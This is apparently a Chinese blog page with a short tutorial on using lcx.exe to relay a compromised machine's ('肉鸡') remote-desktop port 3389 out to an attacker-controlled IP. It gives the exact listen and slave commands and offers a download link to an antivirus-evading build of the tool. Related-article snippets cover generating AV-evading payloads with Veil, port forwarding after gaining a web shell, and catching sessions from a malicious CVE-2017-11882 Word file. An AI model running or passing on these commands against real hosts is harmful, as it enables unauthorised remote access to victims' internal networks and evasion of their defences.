lcx.exe内网转发命令教程 + LCX免杀下载

作者: 小健

本机: lcx -listen 2222 3333

2222为转发端口,3333为本机任意未被占用的端口

肉鸡:lcx -slave 119.75.217.56 2222 127.0.0.1 3389

119.75.217.56 为本机IP,2222为转发端口,127.0.0.1为肉鸡内网IP,3389为远程终端端口

3389连接时格式 127.0.0.1:3333

今天刚刚第一次使用,特此共享!

另外提供我的免杀lcx.exe 提供给大家下载。

下载是:http://www.xiaojian.org/upload/lcx.rar

时间: 2024-10-12 03:59:47

lcx.exe内网转发命令教程 + LCX免杀下载的相关文章

Kail Linux渗透测试教程之免杀Payload生成工具Veil

Kail Linux渗透测试教程之免杀Payload生成工具Veil 免杀Payload生成工具--Veil Kail Linux渗透测试教程之免杀Payload生成工具Veil,Veil是一款利用Metasploit框架生成相兼容的Payload工具,并且在大多数网络环境中能绕过常见的杀毒软件.本节将介绍Veil工具的安装及使用. 在Kali Linux中,默认没有安装Veil工具.这里首先安装Veil工具,执行如下所示的命令: root@kali :~# apt-get update &&am

内网渗透工具介绍------Lcx.exe

0x00简介 Lcx是一款端口转发工具,可以将内网机器的端口映射到带公网IP的机器上.一般进行渗透的时候,通过web漏洞getshell之后,需要对其进行远程登录,这就需要用到端口映射. 0x01使用 第一步:在内网主机上上传lcx.exe文件,执行 Lcx.exe –slave RemoteHost RemotePort LocalHost LocalPort 如图中显示则连接成功 第二步:在公网机器上执行以下命令,监听51端口,转发到公网机器的3389端口 Lcx.exe –listen S

网络安全系列之二 利用lcx实现内网端口转发

内网中的主机一般都是使用私有IP,在网络出口处经过NAT转换为公网IP之后,才能访问Internet.在这种网络结构下,通信双方之间实现的是单向访问,即只有内网中的主机可以主动访问Internet中的主机,反之则不行.如果在内网中架设了一台服务器,又需要允许Internet中的用户访问这台服务器,那么就必须在网络出口处进行端口映射.在网络攻防中,如果捕获了一台位于内网中的肉鸡,那么黑客是无法主动去连接这台肉鸡的,而且也不可能在人家的网络出口做端口映射,这时就可以用到lcx这个小工具了.下载地址:

[Linux] SSH内网转发

有这样一个场景:kali 内网虚拟机CentOS7.3 阿里云外网机本机win7 模拟受害者 11月份有爆出过Office的一个关于公式编辑器的漏洞(CVE-2017-11882),参考复现过程可以参考我的另一篇文章,通常为了验证漏洞,我们会在本地测试该漏洞是否确实可以利用.我们在虚拟机测试的环境局限于内网,如果我想发给外网的一个朋友,他打开这个word文档,我就可以在kali机获取到一个session. 大致流程:1.我们事先生成恶意word文档,并在kali下打开msf,监听4444端口,等

Linux渗透+SSH内网转发

http://www.jb51.net/hack/58514.html http://blog.chinaunix.net/uid-756931-id-353243.html http://blog.163.com/czg_e/blog/static/46104561201552423342331?ignoreua http://www.noah.org/wiki/SSH_tunnel http://www.myhack58.com/Article/60/63/2013/38396_3.htm

golang爬坑:一个简单的http内网转发

最近有一个需求,就是需要从内网服务器的一个端口请求数据,问题是这个内网端口不能被外网访问到,所以需要做一个转发代理服务.原理就是当请求到达时,将本机的地址替换成目标地址,然后其他格式不变,待目标请求返回后,又将目标的报文头及报文返回给客户端.具体代码如下: func main() { localHost := "127.0.0.1:9001" targetHost := "127.0.0.1:8001" httpsServer(localHost, targetHo

Tunna内网转发

使用方法: 上传源码包中文件夹webshell下的脚本至网站目录,然后本地进行连接上传的webshell即可 python proxy.py -u http://172.0.0.1/conn.php -l 1234 -r 3389 -v 这样就转发了webshell所在主机的3389到你本地的1234上,本地直接远程127.0.0.1:1234即可 python proxy.py -u http://172.0.0.1/conn.php -l 1234 -a 172.0.0.2 -r 3389

内网转发ngrok的使用

1.下载解压ngrok:https://ngrok.com/download 2.执行ngrok会打开控制台 3.输入命令,开始映射本地的8080端口 ngork http 8080 控制台会返回一个url,该url就是映射到你电脑的8080端口. 每次重启ngrok或电脑,返回的url都是随机的. 有部分教程说注册获得token,有了token就允许自定义三级域名,但我尝试了提示需要付费才允许自定义三级域名.

内网渗透之端口转发

内网端口转发最常见的不外乎lcx与nc反弹了,好久不用快忘了,今天总结一下 一.使用lcx进行内网端口转发 Lcx.exe是一个端口转发工具,相当于把目标服务器A上的3389端口转发到具有外网ip地址的B机上(即我们自己的主机或是已经控制的主机),这样链接B机的3389端口就相当于链接A机的3389端口了,Lcx程序多用于被控制计算机处于内网的时候,被控制机可能中了木马程序,虽然能够进行控制,但还是没有使用远程终端登录到本机进行管理方便,因此在很多情况下,都会想方设法在被控制计算机上开启3389